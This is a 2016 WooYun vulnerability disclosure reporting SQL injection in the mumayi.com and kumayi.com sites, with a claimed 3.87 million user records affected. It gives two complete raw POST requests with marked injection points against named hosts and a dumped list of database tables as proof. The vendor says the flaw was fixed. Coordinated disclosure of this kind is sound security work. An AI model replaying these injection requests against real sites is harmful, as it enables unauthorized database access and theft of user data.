当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169218

漏洞标题:木蚂蚁再次SQL注入影响多个站(涉及387万用户数据\以及酷蚂蚁)打包两处

相关厂商:mumayi.com

漏洞作者: 路人甲

提交时间:2016-01-12 08:30

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-12: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向核心白帽子及相关领域专家公开
2016-02-01: 细节向普通白帽子公开
2016-02-11: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

SQL
SQL
SQL
注入~

详细说明:

这次还包括移动站的问题
#1:post注入点:
参数:search

POST /index.php?s=/home/search/searchresult HTTP/1.1
Host: m.kumayi.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://m.kumayi.com/index.php?s=/home/search/searchresult
Cookie: PHPSESSID=f6asf9aqglj3qj4in2r51ro806; 3d3fae5ec5623f99b660d6069647577a=MjgzNA%3D%3D; 14c4b06b824ec593239362517f538b29=MTgzMjU2MjI1NjI%3D; CNZZDATA1255732784=1970221751-1452517252-http%253A%252F%252Fm.kumayi.com%252F%7C1452517252; 0f518e1608f240990835a3490e61c734=%2C%27
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
search=1*


#2:post注入
参数:uid

POST /index.php?s=/Home/Index/personal HTTP/1.1
Host: www.kumayi.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.kumayi.com/index.php?s=/Home/Index/accountset
Cookie: PHPSESSID=86tdgc15vuq8ff2snl8m1tpm43; CNZZDATA1255732784=1054442556-1452495201-http%253A%252F%252Fwww.kumayi.com%252F%7C1452517252; 3d3fae5ec5623f99b660d6069647577a=MjgzNA%3D%3D; 0f518e1608f240990835a3490e61c734=%2C138%2C%E6%80%92%E6%96%A9%E8%BD%A9%E8%BE%95%2C%E6%94%BE%E5%BC%80%E9%82%A3%E4%B8%89%E5%9B%BD%2C%E5%A5%B3%E7%A5%9E%E8%81%94%E7%9B%9F%2C%27%2C%E2%80%98%2C1
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------13155976113642303642084312376
Content-Length: 1021
-----------------------------13155976113642303642084312376
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------13155976113642303642084312376
Content-Disposition: form-data; name="username"
183********
-----------------------------13155976113642303642084312376
Content-Disposition: form-data; name="year"
0
-----------------------------13155976113642303642084312376
Content-Disposition: form-data; name="month"
-1
-----------------------------13155976113642303642084312376
Content-Disposition: form-data; name="day"
-1
-----------------------------13155976113642303642084312376
Content-Disposition: form-data; name="province"
10
-----------------------------13155976113642303642084312376
Content-Disposition: form-data; name="city"
1001
-----------------------------13155976113642303642084312376
Content-Disposition: form-data; name="uid"
2834*
-----------------------------13155976113642303642084312376--

漏洞证明:

屏幕快照 2016-01-11 下午9.07.33.png


Database: uc_mumayi
[34 tables]
+-------------------------+
| cdb_uc_admins           |
| cdb_uc_applications     |
| cdb_uc_badwords         |
| cdb_uc_domains          |
| cdb_uc_failedlogins     |
| cdb_uc_feeds            |
| cdb_uc_friends          |
| cdb_uc_jihuopass        |
| cdb_uc_mailqueue        |
| cdb_uc_memberfields     |
| cdb_uc_members          |
| cdb_uc_mergemembers     |
| cdb_uc_newpm            |
| cdb_uc_notelist         |
| cdb_uc_pm_indexes       |
| cdb_uc_pm_lists         |
| cdb_uc_pm_members       |
| cdb_uc_pm_messages_0    |
| cdb_uc_pm_messages_1    |
| cdb_uc_pm_messages_2    |
| cdb_uc_pm_messages_3    |
| cdb_uc_pm_messages_4    |
| cdb_uc_pm_messages_5    |
| cdb_uc_pm_messages_6    |
| cdb_uc_pm_messages_7    |
| cdb_uc_pm_messages_8    |
| cdb_uc_pm_messages_9    |
| cdb_uc_pms              |
| cdb_uc_protectedmembers |
| cdb_uc_settings         |
| cdb_uc_sqlcache         |
| cdb_uc_tags             |
| cdb_uc_vars             |
| user4                   |
+-------------------------


更多证明同: WooYun: 木蚂蚁SQL注入影响多个站(涉及387万用户数据\以及酷蚂蚁)

修复方案:

蚂蚁兄弟,多来点rank可好?

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-12 16:40

厂商回复:

已修复,感谢作者的反馈!

最新状态:

暂无